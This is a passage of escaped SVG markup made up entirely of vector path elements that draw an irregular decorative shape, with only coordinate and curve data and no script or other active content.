d=\"M788,35.4c1.5.3,1.9.5,3.3.8-1.7-.8-1.4-1-2.7-1.7C788.6,34.9,787,34.8,788,35.4Z\"></path>\n <path d=\"M757.2,29.7a24.5,24.5,0,0,0,3.5,1.2C760.6,30.5,760.9,30.2,757.2,29.7Z\"></path>\n <path d=\"M822.2,40.4c3.2.5,4.3-.1,1.5-.9C824.5,40.1,819.4,39.6,822.2,40.4Z\"></path>\n <path d=\"M792.7,35.2c3.8.6,4-.2-.5-1A7.77,7.77,0,0,1,792.7,35.2Z\"></path>\n <path d=\"M771.3,30.8c-2.5-.4-2.5-.8-4.4-1.2,1,.7,1.1,1.4,5.9,2.3C773.3,31.5,766.8,30.3,771.3,30.8Z\"></path>\n <path d=\"M755.5,28.2c2.7.2-2.4-1.1.5-.9-2.8-.4-2.2-.6-4.3-.9C753.8,27.2,751.7,27.1,755.5,28.2Z\"></path>\n <path d=\"M769.3,28.7c-3.3-.6-1.8.1-3.9-.1,2.5.4,1.2.7,3.4,1.1a5.85,5.85,0,0,1,2,.2c-2.2-.9.8.1,1.9-.1C769.8,29,767.5,28.9,769.3,28.7Z\"></path>\n <path d=\"M894.1,49.3c-3.4-.7-2.9.4.4.8C895.2,49.9,891.9,49.2,894.1,49.3Z\"></path>\n <path d=\"M1097.3,82.7a4.69,4.69,0,0,0,2.5,1.3c-.6-.4,1.8.1.8-.4C1096.4,82.9,1101.5,83.4,1097.3,82.7Z\"></path>\n <path d=\"M833,38.6c-.4.1-3.3-.4-1.9.1,1.2.2,3,.5,3.2.6s0,.3,1.2.5C836.9,39.8,834.7,39.2,833,38.6Z\"></path>\n <path d=\"M768.9,27.8c-1,0-2-.1-3-.2.2-.2-.5-.5-2.3-.8-.4.3,2.5.9.3.7,2,.3,2.4.5,4.3.8C766.3,27.7,772.4,28.6,768.9,27.8Z\"></path>\n <path d=\"M773.8,28c-.8.1-4.2-.6-2.9.1,1.6.2,3.9.7,4.1.6a10.32,10.32,0,0,1-2.2-.5C772.8,28,777.4,28.7,773.8,28Z\"></path>\n <path d=\"M756.1,25.3c.2-.2,3.1.3,4,.2-2.4-.4-4-.7-5.2-.8C755.1,24.9,754.9,25,756.1,25.3Z\"></path>\n <path d=\"M775.5,27.5c-.2.2-3.8-.5-4-.3,3.8.5,1.9.7,5.4,1.2C776.2,28.1,777.9,27.9,775.5,27.5Z\"></path>\n <path d=\"M800.7,31.7c-5.5-1.1-2.1.5.2.5C798.3,31.7,800.5,31.7,800.7,31.7Z\"></path>\n <path d=\"M767,25.8c.4.3,9,1.8,5.2.9,0,.1-.1.1-1-.1-.2-.2,0-.3-1.2-.5C770.1,26.3,767.2,25.7,767,25.8Z\"></path>\n <path d=\"M798.2,30.4c-4.8-.6-3.8-.4-6.4-1.3-.3.3-.2.4-2.8.2,3.2.7,4.3.7,7.5,1.5,1.1,0,1.1-.1-.2-.5C797.5,30.4,798.7,30.6,798.2,30.4Z\"></path>\n <path d=\"M775,26.4c-3.3-.6-4.2-.6-5.1-.5,1.8.3,3.3.6,4.3.8C773.9,26.4,775.3,26.6,775,26.4Z\"></path>\n <path d=\"M868.2,41.4c-.6.3,5.7,1.5,6.5,1.4C872.5,42.4,870.4,41.9,868.2,41.4Z\"></path>\n <path d=\"M1213.9,98.1c-.4.2-2.2.4,1.4,1C1214.6,98.7,1216.3,98.5,1213.9,98.1Z\"></path>\n <path d=\"M1148.4,86.3c-1.6-.1-.9.7,2.5,1.3A7.85,7.85,0,0,0,1148.4,86.3Z\"></path>\n <path d=\"M1152.3,82.2c-1.8,1.1-9.7,2-4.9,4.1,4.7,0,9.5-.3,3.7-2.5,1.9,0,2.6.8,4.2.7C1151.7,83.3,1155.1,82.7,1152.3,82.2Z\"></path>\n <path d=\"M911.4,47c-.8-.4.1-.3,1.2-.2s2.4.3,2.7.3a22.5,22.5,0,0,0-2.7-.5C910,46.2,907.8,46.3,911.4,47Z\"></path>\n <path d=\"M860.1,36.5a5.77,5.77,0,0,0-2.3,1.2c2.7.4,4,.5,4,.2C857.7,37.1,863.6,37.4,860.1,36.5Z\"></path>\n <path d=\"M756.2,19.3c-1.5-.1-6.4-.6-2.8.3C752,18.9,759.3,20,756.2,19.3Z\"></path>\n <path d=\"M842,33.1c5.8,1.3,3.8,1.5,5.8,2.1.2-.2,4.9.8,4,.2-4.6-.6-3-.9-4.5-1.4C844.1,33.5,845.3,33.7,842,33.1Z\"></path>\n <path d=\"M850.7,35c1.5.3,1.9.5,3.2.8-1.7-.8-.4-.7.5-1C851.1,34.2,850.1,34.4,850.7,35Z\"></path>\n <path d=\"M1133.4,81.1c-4.5-.8-3.3,0,.3.6Z\"></path>\n <path d=\"M890,40.4c-2.4-.1,1.4.8,3.5,1.2C894.2,41.3,891.5,40.8,890,40.4Z\"></path>\n <path d=\"M820.8,29a41.32,41.32,0,0,0-5.2-.8c1.7.3.7.4,2.3.7.1-.1-.4-.4.9-.2S821,29.3,820.8,29Z\"></path>\n <path d=\"M851.3,34.3c1.7.1.1-1-2.4-1.1C852.2,33.9,846.6,33.5,851.3,34.3Z\"></path>\n <path d=\"M741.7,15.1c.2.2-.7.1-2-.2.7.3-.9.5,1.4.9C739.4,15.1,745.5,16,741.7,15.1Z\"></path>\n <path d=\"M912.7,44.2c1.7.2,2-.1.1-.5h-.1c-.4.1-2-.1-1.7.2C911.6,44,912.2,44.1,912.7,44.2Z\"></path>\n <path d=\"M755.6,15.7c-3.7-.6-3.3-.9-6.5-1.4,3.3.9,1.6,1.2,4.8,1.9C752.3,15.5,755.3,16,755.6,15.7Z\"></path>\n <path d=\"M862.3,32.9c1.5.6-5.3-.2.4.8C861.7,33.3,865.6,33.6,862.3,32.9Z\"></path>\n <path d=\"M909.2,40.2a5.13,5.13,0,0,0,2.4,1.1c1.2-.1-.3-.2.8-.4Z\"></path>\n <path d=\"M855.6,31a5,5,0,0,0-2.3-.8c-.5.1-2,0-2.9.1a28.64,28.64,0,0,1,3.2.6C853.7,30.8,853.8,30.7,855.6,31Z\"></path>\n <path d=\"M735,11.1c3.4.6,5,.7,5,.4A22,22,0,0,0,735,11.1Z\"></path>\n <path d=\"M1217.9,88c-.1-.3-.7-.8.7-.7C1214.2,86.6,1215.8,87.4,1217.9,88Z\"></path>\n <path d=\"M893.1,32.6c-.3-.4.5-.7-2.5-1.2C890.7,31.8,891.4,32.1,893.1,32.6Z\"></path>\n <path d=\"M885,29.7c.6.6-3.4-.5-5.2-.8-.5.1-2,0-2.9.1,3.2.2,10.4,1.6,12.3,1.5C887.4,30.2,886,29.9,885,29.7Z\"></path>\n <path d=\"M891.9,29.9c-1-.7-5.4-1.8-.6-1.2-3.1-.7-8.5-1.5-10.7-2.1a.35.35,0,0,0,.1.2c3.1.6,5.9,1.3,7.6,1.8C884.4,28.1,889.4,29.4,891.9,29.9Z\"></path>\n <path d=\"M860.4,24.6c3.2.7,4.3.2,1.8-.3C861.8,24.5,859.3,24,860.4,24.6Z\"></path>\n <path d=\"M1216.1,82c.9.7-.5.8,2.6,1.4C1218.6,83,1218.2,82.5,1216.1,82Z\"></path>\n <path d=\"M872.3,25.2c-1.5-.4,0-.7-3.5-1.2C869,24.3,869,24.7,872.3,25.2Z\"></path>\n <path d=\"M861.4,22.8c-1.8-.3-3.3-.6-4.3-.8a19.44,19.44,0,0,0,5.5,1.5C861.2,23.1,861.6,23,861.4,22.8Z\"></path>\n <path d=\"M872.3,23.1c-2.3-.3-3.6-.4-4-.2,1.4.2,2.3.4,3.2.6C870.5,23.1,872.8,23.5,872.3,23.1Z\"></path>\n <path d=\"M889.7,25.2c-2.6-.4-4.2-.5-6.1-.7,1.6.3,1.1.5,1.3.7,1.4.4,3.9.8,5.4,1.1-.1-.2-.2-.3-.2-.5a27,27,0,0,1-3.1-.5.3.3,0,0,0-.1-.2C888.7,25.6,890.4,25.7,889.7,25.2Z\"></path>\n <path d=\"M879,23.1a15,15,0,0,1-2.1-.4,4.83,4.83,0,0,0-2.2-.6c-.4.2.9.6,2.2.9C877.8,23.1,878.7,23.3,879,23.1Z\"></path>\n <path d=\"M883.5,20.2c4.6.8,2.6-.1,2.7-.4C880.8,18.9,885.4,20.1,883.5,20.2Z\"></path>\n <path d=\"M868.9,15.9c-3.3-.5-6.3-.6-8.4-1.4.5.4-4-.6-2.9,0,4.3.5,8.4,1.6,11.5,1.9C865.9,15.8,870,16.3,868.9,15.9Z\"></path>\n <path d=\"M887.4,18.3c-.8-.1-2.4.4,1.4.9C886.7,18.6,890.2,19,887.4,18.3Z\"></path>\n <path d=\"M871.6,15.4a26.52,26.52,0,0,1,5.5,1.3c.3.1.6.1,1,.2-.6-.8,3.8-.5-.7-1.6.2.2,0,.2-.3.3s-.9.1-.3.5C875.3,16,871.3,15.2,871.6,15.4Z\"></path>\n <path d=\"M911,19c-2.8-.6-4.8-.2-.8.4C909.2,18.9,911.6,19.4,911,19Z\"></path>\n <path d=\"M900.4,17.1c4.9.8,8.6,1.3,12.4,1.7-3.4-.6-3.3-1-6.5-1.5C910.3,18.6,902,17,900.4,17.1Z\"></path>\n <path d=\"M1309.9,84.2c.9.5-1.6.1-.7.5,2.4.4,4,.6,5.2.8C1314.5,85.1,1312.9,84.7,1309.9,84.2Z\"></path>\n <path d=\"M874.8,11.9c.1.2-2.9-.4-3-.3,2.8.4,2.2.6,4.3.9C877.3,12.6,877.2,12.3,874.8,11.9Z\"></path>\n <path d=\"M895.9,15.7c.3-.3-1.2-.7-4.4-1.2C891.8,14.9,893.2,15.3,895.9,15.7Z\"></path>\n <path d=\"M885.9,12.9c1.1.4.3.6,3.4,1.1,1.4.1.8-.3.7-.7C886.5,12.7,889.4,13.7,885.9,12.9Z\"></path>\n <path d=\"M886.6,12.3c-6-1.1-1.2.6,1.2.5C886.6,12.6,886.6,12.4,886.6,12.3Z\"></path>\n <path d=\"M892.2,11.9c.2.4,2.9.9,4.5,1.4,1.2,0,5.4.3.7-.7C898.2,13.4,894.2,12.3,892.2,11.9Z\"></path>\n <path d=\"M882.6,7.8c.3-.3,2.9-.3-1.3-.8C883.9,7.6,877.7,7,882.6,7.8Z\"></path>\n <path d=\"M877.4,5.7a24.14,24.14,0,0,1-2.8-.5,6.24,6.24,0,0,0,2.8.7,44,44,0,0,0,5.5.4C880.1,5.6,879.4,5.9,877.4,5.7Z\"></path>\n <path d=\"M768.7,106.5a14,14,0,0,0-4.6-1.5C766.1,105.4,766.2,106.4,768.7,106.5Z\"></path>\n <path d=\"M910.8,116.3a31.2,31.2,0,0,1,5.4,1.2,9.92,9.92,0,0,1-2.5-1.3C910.4,115.7,911.6,116.3,910.8,116.3Z\"></path>\n <path d=\"M917.6,103.9c1.5.2,5.5,1,5.2.8-4.3-1,1-.7-3.7-1.6,0,.3,1.3,1-1.7.5a5.7,5.7,0,0,0-2.3-.8c-.3.3,2.6,1.1,4.4,1.2C919.9,104.2,918.2,103.9,917.6,103.9Z\"></path>\n <path d=\"M743,70a10.32,10.32,0,0,1-2.2-.5c-.1-.1.8,0,.9-.1-3.7-.6-1.2.4-.7.6C741.1,69.8,743.7,70.3,743,70Z\"></path>\n <path d=\"M893.4,89.4c-.5.4-6.9-1.3-7.2-.9C890.1,89.3,896,90.1,893.4,89.4Z\"></path>\n <path d=\"M823.8,75.1c-.6.5,1.2,1.1-1.5,1,2.1.3,1.5.5,4.3.9C823.9,76.2,830,76.1,823.8,75.1Z\"></path>\n <path d=\"M903.3,87.9c3.6.5,3.3.2,6.3,1a12.75,12.75,0,0,1,3.9.1,1.68,1.68,0,0,0,1,.2c-1.1-.4-3.6-.8-4.4-1.2,2.3-.2,2-1,5.4-.9-3.4-.7-2,0-4-.3-.1-.1-.2-.2-1.1-.3.6-.2,4.7.5,5,.3-4.4-.8,1-.3-2.4-1-1.6,0-.4.7-3.8.3.2-.2,1.7-.4-1.5-1.1q.45.45-1.8.3c-1.6-.6,2.3-.3-.4-.8-2.6.4-11.5.7-12,1.2,1.5.1,0-.6,3.9.1-1.2.2-.2.3,3.3.8-.2.2-3.5-.4-2.9.1C902,87.1,906.1,88,903.3,87.9Z\"></path>\n <path d=\"M945.6,93.3c5.7,1.3,5.4,2.2,12.3,3.5-1.5-.5,2.8,0-.3-.6C954.3,96.3,950,93.7,945.6,93.3Z\"></path>\n <path d=\"M928.2,89.2c-3.7-.6,2,0-1.2-.5-7.4-.5-1.7,1.7-4.1,1.5,2.1.3,4.5,1.2,6.3,1.2C922.7,90,925.6,89.1,928.2,89.2Z\"></path>\n <path d=\"M1057,110.4a8.82,8.82,0,0,1,2.9,0c0,.3-1.8,0,1.3.7,2.2.1-1.5-.9-3.5-1.4C1059.2,110.4,1053.9,109.7,1057,110.4Z\"></path>\n <path d=\"M931.9,88.8c-6.7-1.2-.3.9,1.3.8C930.9,89.2,932.5,89.1,931.9,88.8Z\"></path>\n <path d=\"M914,85.9c2.5-.6.8-1.8,3.7-2.4-3.2-.3-3.1-.7-4.2-.7,2.2,1.3,1.6,1.7-4.2,1.3,2.7.5,4.1.9,4.4,1.2-1.8-.3-3.3-.5-4.1-.6C909.9,85,911.4,85.4,914,85.9Z\"></path>\n <path d=\"M1047.5,98.3c-.1.1.3.4-.9.2,0-.3.3-.5,1.8-.4,3.3.5,8.4,1.8,9.6,1.8-4.3-.9-9.4-2.4-4.8-2-3.5-.7-.6.3-4.1-.5.2-.1,1.4,0,.8-.3a19.25,19.25,0,0,0,3.1.5c-1.4-.6,1.5,0,1.9-.1-6.2-1.1-3,.2-10.2-1.1-5.8.1,1.8,3.1-3.2,3.5,1.6.5,2.1.4,3.3.8-3.4-.4,0,.4-1.7.5a16.33,16.33,0,0,1,4.4,1.1,26.85,26.85,0,0,1-4.1-.5c-1.8-.4-.2-.6-2.4-1,.6.3-2.9.1-.7.5a47.56,47.56,0,0,1,7.4,1.3c3-.2.1-1.3-3.1-2.4,0,.1-.8,0-1-.2,2.4.4,1-.2,3,.2s1.7.8,3.5,1.2a18.21,18.21,0,0,1,3.2.5C1049.1,100.1,1053.7,100.2,1047.5,98.3Z\"></path>\n <path d=\"M797,27.8c-1.8-.1-3.1-.7-5.2-.8,6.4,1.5,1.7,1.5,6.2,2.9-2.5-1.3,4.3-1.5-2.6-3.4a6.52,6.52,0,0,0,1.7-.3c-1.1,0-4.9-1.1-6.2-.9C794.5,26.2,791.2,26.6,797,27.8Z\"></path>\n <path d=\"M861.8,6.9c5,.9,1.6.4,1.3.7q3.45.6,3.3.9a12.79,12.79,0,0,0-2.9.1c3.6.5,4.4.3,7,.5a35.67,35.67,0,0,1-5.4-1.2c.2-.2,3.1.3,4,.2-2.7-.4-4.5-.8-4.4-1.1C863.3,6.8,861.5,6.6,861.8,6.9Z\"></path>\n <path d=\"M910.5,13.7c-3.1.2-6.8-.5-13.2-1.3,2.4.8,3.9.6,5.3,1-2.8-.3,1.9.8,2.4,1.1-1,.7-3.4.8,0,2.1-1.9-.2-3.7-.9-4.2-.7,3.7.5,1.1.7,4.4,1.2-1.6-.8-.6-.2,3.1.4-.7-.4-1.8-.9-2.5-1.3,1.2,0,3.9.5,5.1.5-3.2-.6,2.3.2.8-.3-3-.6-2.7-.3-5.2-.8a8.44,8.44,0,0,0-1.2-.4c2.5.3,4.8.7,5,.4a27,27,0,0,1-3.1-.5c1.9.3-2.7-1.4,2.9-.1.1-.2-1.3-.8,1.9-.1C909.1,14,915.8,14.8,910.5,13.7Z\"></path>\n <path d=\"M922.9,80c.8-.1,2.8.2,1.8-.4C921.5,79,922.3,80,922.9,80Z\"></path>\n <path d=\"M887.1,73.8c-.1-.2-.2-.3-.2-.5-2.5-.5-2.2-.2-5.2-.7-.3-.3.8-.4-2.3-.8a11.18,11.18,0,0,0,3.5,1.2C883.7,72.8,885.7,73.6,887.1,73.8Z\"></path>\n <path d=\"M1027,96.2c.8.1,1.5.3,2.3.4,2.9-.2,1.2-.7,3.5-.7C1029.4,95.4,1028.3,96.2,1027,96.2Z\"></path>\n <path d=\"M1047.2,95.7c-1.7-.1-6.4-.5-3.8.1C1042.6,95.2,1049,96.6,1047.2,95.7Z\"></path>\n <path d=\"M924.7,75.5c4.7.9,2-.1,6.1.7,2.2.7-.8.4,1.4.9-1-.6,7,.8,5,.3a39,39,0,0,1-6.5-1.4c1.9.1,1.7-.2.7-.5-1.8-.1-1,.7-5-.3C927.2,75.6,923.4,74.9,924.7,75.5Z\"></path>\n <path d=\"M746.9,45.1a23.56,23.56,0,0,1,4.1.5,12.3,12.3,0,0,0-3.4-1.1C750.8,45.2,743.9,44.7,746.9,45.1Z\"></path>\n <path d=\"M1022.3,87.9l.3.6a18.2,18.2,0,0,0,3.1.5C1023.4,88.6,1025.6,88.4,1022.3,87.9Z\"></path>\n <path d=\"M810.2,50a13,13,0,0,1-3.1-.4c1.2.7-1.6-.1-1.9,0,1.11.21,2.21.48,3.3.8-2.6-.5-2.5.1-.7.7-.8-.4.2-.4,3,.2.4.6,1.1.6.4,1,4.3.7,2,1,5.6,1.6-4.1-1.2.1-1.4-8.2-3.2C807.4,50,813.6,50.9,810.2,50Z\"></path>\n <path d=\"M1046.7,90.4c3.2.4,1.4-.5,3.7-.4,5.9,1.4,7.3,2.7.9,1.9-1-.5,1.3-.1.8-.4-3.7-.5-4.4.6.7,1.4-.5-.9,4.8-.2,7.7-.2-1.2-.2-3-.5-3.2-.6,5.3,1,.3-.3,3.9.1-1.5,0,3.7.9,3.2.6-2.5-.4-2.5-.8-4.4-1.2.9.4-2.1-.1-3-.2.2-.2-1.5-.5-2.3-.7,4,.4,5.5.8,7.1.6-3.4-.6-3.1-.3-5.3-.9,1.4.7-3.5-.3-3.9-.1-.1-.1-.1-.2-.2-.4-1.4-.2-2.8-.5-4.2-.7C1049.9,90.2,1045,89.9,1046.7,90.4Z\"></path>\n <path d=\"M1055.8,93.2a47.23,47.23,0,0,0,4.9.2C1056.2,92.5,1054.6,92.9,1055.8,93.2Z\"></path>\n <path d=\"M1202.1,116.5c2.6.5,2.2.2,5.2.8C1207,116.2,1206,116.7,1202.1,116.5Z\"></path>\n <path d=\"M948.2,74c4.8.6,3.5-.2,2.1-.9-.7-.4-1.5-.7-1-.8-3-.3-1.4.3-.2.8.9.4,1.6.8-.1.7-3.6-.6,2.6,0-2.3-.7C947.5,73.4,945.9,73.6,948.2,74Z\"></path>\n <path d=\"M901,66.1c1.4.2,2.8.5,4.2.7C906.2,65.9,904.9,66.5,901,66.1Z\"></path>\n <path d=\"M961.1,74.7c-1.3-.2-5.6.3-1.5.9C957.4,75,961.7,75.2,961.1,74.7Z\"></path>\n <path d=\"M986.7,77.8c.3.5-6.9,1.1.9,1.9C988.9,79.3,989.9,79.1,986.7,77.8Z\"></path>\n <path d=\"M817.5,49c-5.5-.9-6-2.7-2.1-2.5.8.6.4.8,1.5,1.3-.1-.2,2.9.4,3,.3-.3-.2-.8-.9-3.5-1.2,3,.3.6-.5,1.7-.5-3.1-.4-5.6-1.3-3.4-1a2.57,2.57,0,0,0,1.1.4c6.4-.1-3.8-3.2,4.5-2.8-1.5-.5-5.1-.7-5.3-1,5.7.4-2.3-2,4.1-1.7-1.08-.15-2.14-.35-3.2-.6,2.8.3,1.6-.9-.6-1.2.9-.3,3.6-.2,8.1.8-4.4-1.2,1.7-.3-.5-1-1.6.3-3-.9-6.5-1.4-.5.5-1.3.6,1.6,1.4-7.5-.1-1.9,2.5-4.3,3.3a32.89,32.89,0,0,1-5.2-.9c2.9.9,4.4,1.8,1.8,1.7,2.9.5,3.2.8,3.4,1.1-1.3-.2-1.5-.4-3.2-.6,0,.2.6.3,1.2.5-1.1-.2-1.3-.3-2.2-.5,1.6.6-2.6.1.3.7a6.05,6.05,0,0,1,1.9,0c-.1.2,1.3.5,1.3.7-4-.8-1.8,0-5.1-.6,3.1.9,3.4,1.1,1.6,1.4a24.16,24.16,0,0,1,4.3.9c-5-1.1-3.9.1-1.6.7-1.4-.2-2.3-.4-3.2-.6,1.2.9.9,1.6-2.1,1.6,4.7.7,3.3,1.3,2.6,1.4-1.3-.3-2.4-.5-3.3-.8,3,.7,2.7,0,.8-.3.9.8-3.3-.1-5-.3a72,72,0,0,0,10.6,2c-.4-.4-2.6-1.7,1.5-.9-3-.4,1.7.5,1.2.5-.6.4.4.5-.6.8a14,14,0,0,1,3.2.8c0-.2,3.4.5,3,.2C815.3,50.2,822.3,50.4,817.5,49Z\"></path>\n <path d=\"M983.5,77.3c-.2-.4-3.9-1.1-5.6-1.6C975,74.8,979.8,76.8,983.5,77.3Z\"></path>\n <path d=\"M888.4,59.9c2.4.2,1.7-.3-1.4-1,.6.9,1.9,1.6,0,2,1.4.2,4.1,1.1,4.3.8-3.7-1-.3-1,2.4-1C891.1,60.2,891.4,60.5,888.4,59.9Z\"></path>\n <path d=\"M1043,84.4c-1.7.2,2.5,1,.6,1.2,6,1,.4-1-1.7-1.6-.4.1-5.1,0-2.8.2C1040.8,84.4,1040.5,84.1,1043,84.4Z\"></path>\n <path d=\"M789.8,41.4c-6.2-1.1,1.8-.1-3.4-1.1.4.3-1.3,0-1.9,0,5.8,1.2-1.2.9,2.8,1.9C786.8,41.6,787.1,41.2,789.8,41.4Z\"></path>\n <path d=\"M792,42c.1.4-3.6-.8-3.1-.4,1,.3.4.4,1.4.9,1.4.2,2.8.5,4.2.7C794.1,42.8,795,42.5,792,42Z\"></path>\n <path d=\"M896.8,59.3c-.4-.3,5.4.5,1.8-.4.5.3-3-.4-3-.2,2.3.5-1.4.3,2.4,1.1.4-.2,1.7.5,3.2.6C902.2,60.2,897.6,59.7,896.8,59.3Z\"></path>\n <path d=\"M1015.1,78.7c3.3.6,1.9,0,5.1.6,0-.1-.1-.2-.2-.4C1017.3,78.6,1017.2,78.9,1015.1,78.7Z\"></path>\n <path d=\"M905.3,56.6c-5.8-.8-5.7-.6-10.3-1.4-.1.5,2.2,1-.6.8,7.5,1.4.4,1.3,2.8,1.9,2.6.2,0-.9,4.8-.1,2.6.6-1.7,0,1.3.7-.2-.6,1.4-1-1.9-2,3,.6,2.6.3,5.2.8C906.7,57.1,905.2,56.8,905.3,56.6Z\"></path>\n <path d=\"M1143,95.6c-.8-1.1-4.4-2.8-.3-2.8-3.8-.5-1.7,0-4.3-.8,1.7,1-8.7.1-3.1,1.7a19.06,19.06,0,0,0-3.1-.4c4.5.7.7.5-.8.3,2,.9-.5,1.3-1,1.9,2.5.3,5.2,1.1,5.3.9-1.5-.3-1.3-.5-2.3-.7,6.5,1.1,4.9.5,9.3,1.2-4.8-.9,1.4-1-3.7-1.7C1139,95,1142.5,95.7,1143,95.6Z\"></path>\n <path d=\"M792.2,36.3c-2.7,0-.7,1.1,1.9,2-1-.6,1-.4.6-.8C790.2,36.8,796.2,37,792.2,36.3Z\"></path>\n <path d=\"M902.9,53.5c2.6.5,3.4.8,4.1.6-2.8-.4.7-.5-3.4-1-.9.1,3.3.9.2.5-3.9-1.1-2.7-1.8-1.9-2-6.7-1.4-3.7.6-3.3,1.1l-2.1-.3c.7-.2-1.8-.6-2.4-1,.3-.2,2.1.1,1.8-.3-3.5-.6-1.5.2-2.8.2,1.1.4,3.4.9,3.5,1.2-4.4-.5-.7.6-3.6.5q3.45.6,3.3.9a19.07,19.07,0,0,0-2-.2c0-.2-.9-.4-2.3-.7,1,.6-.2.7-2.7.4,3.6.4.8.5,3.3.9,2.3.2-1.5-1.1,3.9,0-.3.1-1.4,0-.8.3,4.5.8,5.3.8,8.5,1.6.9-.3-3.7-1-3.5-1.4,3.7.7,5.5,1.3,6.2.9-4.2-.7-6.3-1.3-6.6-1.8C905.2,55.2,901.7,53.6,902.9,53.5Z\"></path>\n <path d=\"M753.8,28.6c3.9.5,2.2.7,5.4,1.1,1.5.1-.7-.9-2.3-.7-.3-.3,4.9.1-.4-.8,1.5.8-1.8.6-4-.2-2.9-.3,2.1,1.4-2.6.6,3.2.8,2.3.9,3.6,1.5C756.8,30.2,750.3,28.4,753.8,28.6Z\"></path>\n <path d=\"M866.5,46c-1.6,0-6.8-1.1-5.1-.6,5.5,1,2.2,1.3,5.6,1.7C866.2,46.8,865.9,46.4,866.5,46Z\"></path>\n <path d=\"M752.4,25.5c-4.1-.5-10.9-1.9-13.6-2.1,5.3,1,5.7,1.6,9.9,2.5C746.1,24.9,749.4,25.3,752.4,25.5Z\"></path>\n <path d=\"M894.3,47.7c-2.1.2,1.6,1.5-1.4,1.2,7,1.2,3.5,1,5.7,1.8,2,.4,2.3.3,4.1.6-.1-.2-.2-.5-.3-.7-4.2-.8-1.7-1.1-1.5-1.1a42.22,42.22,0,0,0,4.3.8c.3-.2-2-.6-1.3-.8-3.5-.7-.6.3-4.1-.5.7-.2-1.6-.6-1.3-.8,5.9.6,5.2-.4,3.3-1.2C894.9,46.2,899.5,49.3,894.3,47.7Z\"></path>\n <path d=\"M902.5,29.9c-5.4-.8,0,1.3-4.5.8.2-.3-6.3-1.5-5.2-.9,7.9,1,7.5,3,7.5,3.6,2.6.4-.6.8,2.7,1.6-.9,0-3.8-.6-3-.2,3.5.5,3.4,1.3,5.8,2.1-1.3-.2-1.4-.1-3.1-.4.1-.3-.2-.6-3.4-1.1,2.6.8,1,1.3,0,1.7a14.29,14.29,0,0,0-4.5-1.2c3,.6-.1.5.3.7,1.3.2,2.6.4,3.8.6-.5.3-.5.6.8,1-3.3-.6-2.1-.4-5.3-.9.1.3,2,.7,1.4.9-3.9-.7-4.5-.6-3.9-.1,2.5.2,2,.1,6.1.6.5.3,1.7.8.3.7-4.8-1.3-.5.2-5.2-.9a23,23,0,0,1-4.5.8c4,.7.4-.5,5,.4.1.2.2.5.3.7a21,21,0,0,0-4.1-.5c10,1.6,1.9,2.3,9.7,4.2-1.6-.3-2.7-.6-4.3-.9.4.3-1.3,0-1.9,0,1.5.5,3.1.3,4.3.8.4.5-.4.2-2-.2-.6.4,5.1,1.1,4.5,1.4-6.7-1.2.8.7-3.8,0,4.4,1,0,.5.5,1.1,4.5.9-.1-.6,2.9-.1.1.2,1.9.4,2.2.6a62.51,62.51,0,0,0,7.1.7c-6.9-1.1.8-.2-2.4-1.1,1.6.4,2.6.6,3.1.4-2.4-.4-1.3-.5-3.3-.9-.3.2-.1.5-2.9,0-2.2-1.5,2.1-1.5,5.8-2.2,4.1.9-1.5.6.5,1a17,17,0,0,1,3.1.5h0v-.1a.33.33,0,0,1,0-.47h0a.18.18,0,0,0,0-.27h0a6.37,6.37,0,0,0-1.7-.6c-.1.1-.2.2-2-.1-1.4-.6.5-.4-1.4-.9-8.6-1-4.5-2-2.9-2,.9-.3-2.8-.8-2.4-1.1,4,.6,5.5.5,3.8-.1-5.1-1-1.1.5-4.9-.1-.9-.6,3.8,0,.5-.9a29.59,29.59,0,0,0,5.2.8c-3-1.4-.3-1.4-3.2-2.6,2.1.3,1.5.6,4.3.9-2.1-1.9.1-3.1-3.4-5.2,3.8.7.7-.6,4,.1-4.3-1.2,1.9-.8-3-2.2,0,.1-1.3-.1-1.1-.3,2.8.4,2.2.6,4.3.9-.7-.3.9-.5-1.4-.9-.1.1-.2.2-2-.1-.1-.8,2-1,4.3-1.2,1.5.6,1,.6-.7.6,1.9.3,2.3.3,4,.6h.2a.3.3,0,0,1-.2-.1c-3.1-1.5-8.9-2.8-8.5-3.9-4.2-.8-2.4-.1-5.1-.5.2.4,2.9.9,3.5,1.2-4.6,0,.1,2.2.4,3a28.56,28.56,0,0,0-4.3-.9C899,29.1,901.3,29.5,902.5,29.9Z\"></path>\n <path d=\"M907.2,42c.5-.1-1.5-.8.8-.4,1.1.2,2.6.4,1,.1-1.4-.2-2.8-.5-4.2-.7C906.5,41.4,903.8,41.3,907.2,42Z\"></path>\n <path d=\"M909.1,48.3c-.8.2-2.1-.5-3.2-.6a5.88,5.88,0,0,1-2-.2c-.1.5,4.1.8,4.4,1.1-3.1-.4-2.9.1-3.7.4C907.7,49.2,909.7,48.6,909.1,48.3Z\"></path>\n <path d=\"M738.1,23.9c-1.8-.7.8-.5-2.5-1.2C732.6,22.5,739.1,24.3,738.1,23.9Z\"></path>\n <path d=\"M846.8,41.2c-.8.2,4.8,1.7,4.4,1.2C846.9,41.9,851.1,41.8,846.8,41.2Z\"></path>\n <path d=\"M839.8,40.7c3.3.6,1.9,0,5.1.6-.6-.3.9-.4-1.3-.8C845.2,41.4,840,40.4,839.8,40.7Z\"></path>\n <path d=\"M772.5,29.2c-1.9.3,10.2,2,5.3.9C777.6,30.6,774.4,29.5,772.5,29.2Z\"></path>\n <path d=\"M757.7,26.5c-.3-.2.2-.4-1.3-.7-.7,0-2.7.4-.8.4.1-.4,4.1,1,4.1.6Z\"></path>\n <path d=\"M763.2,25.9a1.82,1.82,0,0,0-1.1-.2c4.2.8-.1.3.3.7,3.4.4,3.1-.2,8.1.7-2.1-.3-1.5-.6-4.3-.9C766.5,26.4,765.3,26.3,763.2,25.9Z\"></path>\n <path d=\"M774.2,24.6c-1,.2,2.2.5,2.5.7.2,0,.5-.1.7-.1C776,25,775.1,24.8,774.2,24.6Z\"></path>\n <path d=\"M776.7,25.3a.37.37,0,0,0-.3.1h.2C776.7,25.4,776.7,25.4,776.7,25.3Z\"></path>\n <path d=\"M768.8,23.4c-2.8.1-1.2.2-.4,1.2,5.6,1.1,3.4,1,8.8,2.4-2.4-1-2.2-1.3-.9-1.5-2-.4-2.1-.6-4.2-1-.7.3,3.4,1.2-.7.7C768.1,24.1,773.5,24.3,768.8,23.4Z\"></path>\n <path d=\"M752.7,22.1c-4.3-1.2-3.1-1.9-8.1-2.8C747.3,20.3,748.1,21.1,752.7,22.1Z\"></path>\n <path d=\"M847.2,35.8c2.5.5,1.3.7,3.4,1.1.7-.4-2.4-1.2,1.5-1C849,35.5,849.5,36.1,847.2,35.8Z\"></path>\n <path 